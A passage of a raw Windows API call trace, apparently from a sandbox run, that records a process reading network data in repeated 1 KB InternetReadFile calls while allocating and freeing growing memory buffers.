lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.277] VirtualFree (lpAddress=0x363c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.277] VirtualAlloc (lpAddress=0x35e0000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e0000 [0099.279] VirtualFree (lpAddress=0x35b0000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0099.280] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.281] VirtualAlloc (lpAddress=0x3610000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x3610000 [0099.281] VirtualFree (lpAddress=0x360c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.283] VirtualFree (lpAddress=0x35dc000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0099.284] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.284] VirtualFree (lpAddress=0x3608000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.284] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.287] VirtualFree (lpAddress=0x3610000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0099.288] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.288] VirtualFree (lpAddress=0x363c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.288] VirtualAlloc (lpAddress=0x35e0000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e0000 [0099.291] VirtualFree (lpAddress=0x35b0000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0099.292] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.292] VirtualAlloc (lpAddress=0x3610000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x3610000 [0099.292] VirtualFree (lpAddress=0x360c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.294] VirtualFree (lpAddress=0x35dc000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0099.295] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.296] VirtualFree (lpAddress=0x3608000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.296] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.298] VirtualFree (lpAddress=0x3610000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0099.299] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.300] VirtualFree (lpAddress=0x363c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.300] VirtualAlloc (lpAddress=0x35e0000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e0000 [0099.302] VirtualFree (lpAddress=0x35b0000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0099.303] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.303] VirtualAlloc (lpAddress=0x3610000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x3610000 [0099.306] VirtualFree (lpAddress=0x35dc000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0099.307] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.307] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.309] VirtualFree (lpAddress=0x360c000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0099.311] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.311] VirtualFree (lpAddress=0x363c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.311] VirtualAlloc (lpAddress=0x35e0000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e0000 [0099.314] VirtualFree (lpAddress=0x35b0000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0099.314] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.315] VirtualAlloc (lpAddress=0x3610000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x3610000 [0099.317] VirtualFree (lpAddress=0x35dc000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0099.318] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.318] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.320] VirtualFree (lpAddress=0x360c000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0099.321] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.321] VirtualAlloc (lpAddress=0x35e0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e0000 [0099.322] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.322] VirtualFree (lpAddress=0x363c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.322] VirtualAlloc (lpAddress=0x35e4000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e4000 [0099.325] VirtualFree (lpAddress=0x35b0000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0099.326] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.326] VirtualAlloc (lpAddress=0x3618000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x3618000 [0099.326] VirtualFree (lpAddress=0x3614000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.329] VirtualFree (lpAddress=0x35e0000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0099.330] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.330] VirtualFree (lpAddress=0x3610000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.330] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.333] VirtualFree (lpAddress=0x3618000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0099.334] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.334] VirtualFree (lpAddress=0x3648000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.334] VirtualAlloc (lpAddress=0x35e4000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e4000 [0099.336] VirtualFree (lpAddress=0x35b0000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0099.337] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.338] VirtualAlloc (lpAddress=0x3618000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x3618000 [0099.338] VirtualFree (lpAddress=0x3614000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.340] VirtualFree (lpAddress=0x35e0000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0099.341] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.342] VirtualFree (lpAddress=0x3610000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.342] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.344] VirtualFree (lpAddress=0x3618000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0099.345] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.346] VirtualFree (lpAddress=0x3648000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.346] VirtualAlloc (lpAddress=0x35e4000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e4000 [0099.348] VirtualFree (lpAddress=0x35b0000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0099.349] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.349] VirtualAlloc (lpAddress=0x3618000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x3618000 [0099.350] VirtualFree (lpAddress=0x3614000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.352] VirtualFree (lpAddress=0x35e0000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0099.353] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.353] VirtualFree (lpAddress=0x3610000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.354] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.356] VirtualFree (lpAddress=0x3618000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0099.357] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.357] VirtualFree (lpAddress=0x3648000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.357] VirtualAlloc (lpAddress=0x35e4000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e4000 [0099.360] VirtualFree (lpAddress=0x35b0000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0099.361] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.361] VirtualAlloc (lpAddress=0x3618000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x3618000 [0099.366] VirtualFree (lpAddress=0x35e0000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0099.367] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.367] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.370] VirtualFree (lpAddress=0x3614000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0099.371] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.371] VirtualFree (lpAddress=0x3648000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.372] VirtualAlloc (lpAddress=0x35e4000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e4000 [0099.375] VirtualFree (lpAddress=0x35b0000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0099.376] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.376] VirtualAlloc (lpAddress=0x3618000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x3618000 [0099.379] VirtualFree (lpAddress=0x35e0000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0099.381] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.381] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.391] VirtualFree (lpAddress=0x3614000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0099.392] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.392] VirtualAlloc (lpAddress=0x35e4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e4000 [0099.392] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.393] VirtualFree (lpAddress=0x3648000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.393] VirtualAlloc (lpAddress=0x35e8000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e8000 [0099.395] VirtualFree (lpAddress=0x35b0000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0099.397] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.397] VirtualAlloc (lpAddress=0x3620000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x3620000 [0099.398] VirtualFree (lpAddress=0x361c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.400] VirtualFree (lpAddress=0x35e4000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0099.402] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.402] VirtualFree (lpAddress=0x3618000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.403] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.406] VirtualFree (lpAddress=0x3620000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0099.407] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.408] VirtualFree (lpAddress=0x3654000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.408] VirtualAlloc (lpAddress=0x35e8000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e8000 [0099.411] VirtualFree (lpAddress=0x35b0000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0099.412] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.412] VirtualAlloc (lpAddress=0x3620000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x3620000 [0099.412] VirtualFree (lpAddress=0x361c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.415] VirtualFree (lpAddress=0x35e4000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0099.416] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.420] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.423] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.423] VirtualAlloc (lpAddress=0x3620000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x3620000 [0099.427] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.436] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.436] VirtualAlloc (lpAddress=0x3620000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x3620000 [0099.440] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.440] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.444] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.447] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.447] VirtualAlloc (lpAddress=0x3620000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x3620000 [0099.451] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.451] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.455] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.455] VirtualAlloc (lpAddress=0x35e8000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e8000 [0099.455] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.459] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.459] VirtualAlloc (lpAddress=0x3628000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x3628000 [0099.464] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.468] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.472] VirtualAlloc (lpAddress=0x3628000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x3628000 [0099.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.481] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.484] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.485] VirtualAlloc (lpAddress=0x3628000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x3628000 [0099.489] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.492] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.496] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.496] VirtualAlloc (lpAddress=0x3628000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x3628000 [0099.500] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.501] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.504] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.508] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.508] VirtualAlloc (lpAddress=0x3628000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x3628000 [0099.512] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.513] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.516] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.516] VirtualAlloc (lpAddress=0x35ec000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x35ec000 [0099.517] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.521] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.521] VirtualAlloc (lpAddress=0x3630000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x3630000 [0099.526] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.530] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.534] InternetReadFile (in: hFile=0xcc000c, 